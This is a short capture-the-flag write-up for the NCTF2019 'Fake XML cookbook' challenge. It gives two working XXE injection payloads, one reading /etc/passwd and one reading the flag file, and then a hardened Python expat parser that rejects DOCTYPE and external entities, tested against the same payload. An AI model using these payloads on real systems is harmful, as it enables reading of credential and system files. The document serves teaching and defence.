[NCTF2019]Fake XML cookbook
XML external entity (XXE) injection; for the underlying principle see https://www.freebuf.com/vuls/175451.html
First, capture the request.
Then add a malicious external entity to read the /etc/passwd file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user><username>&admin;</username><password>123456</password></user>
The file contents are echoed in the response, which shows the entity is resolved and reflected (in-band XXE), so the same payload can read the flag:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
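From the defender's side, the fix is a parser that never declares or resolves entities. The following is an added example (not part of the writeup and not the challenge's own code) using Python's stdlib expat bindings: it aborts on any DOCTYPE, refuses external entity fetches, and is run against a constructed benign login document and the payload above.

```python
"""Hardened XML parsing that refuses the DOCTYPE/entity trick shown above."""
import xml.parsers.expat as expat


class UnsafeXMLError(Exception):
    """Raised when a document carries a DOCTYPE or asks for an external entity."""


def parse_user(xml_bytes: bytes) -> dict:
    """Parse <user><username/><password/></user> without resolving entities.

    A DOCTYPE (the only place an attacker can define &admin;) aborts parsing
    before any entity is declared; as a second line of defence the external
    entity handler refuses every fetch instead of opening the system id.
    """
    parser = expat.ParserCreate()
    fields: dict = {}
    open_elems = []  # stack of currently open element names

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE '{name}' is not allowed in user documents")

    def on_external_entity(context, base, system_id, public_id):
        raise UnsafeXMLError(f"refusing to load external entity {system_id!r}")

    def on_start(name, attrs):
        open_elems.append(name)
        if name in ("username", "password"):
            fields[name] = ""

    def on_end(name):
        open_elems.pop()

    def on_chars(data):
        if open_elems and open_elems[-1] in fields:
            fields[open_elems[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(xml_bytes, True)  # exceptions from handlers propagate here
    return fields


# Constructed sample inputs: a benign login document and the XXE payload above.
BENIGN = b'<?xml version="1.0"?><user><username>alice</username><password>123456</password></user>'
XXE = (b'<?xml version="1.0" encoding="utf-8"?>'
       b'<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>'
       b'<user><username>&admin;</username><password>123456</password></user>')


def is_rejected(xml_bytes: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_user(xml_bytes)
    except UnsafeXMLError:
        return True
    return False
```

The rejection happens at the DOCTYPE declaration, so /etc/passwd is never opened; a login handler built on this parser logs the UnsafeXMLError and returns a generic error to the client.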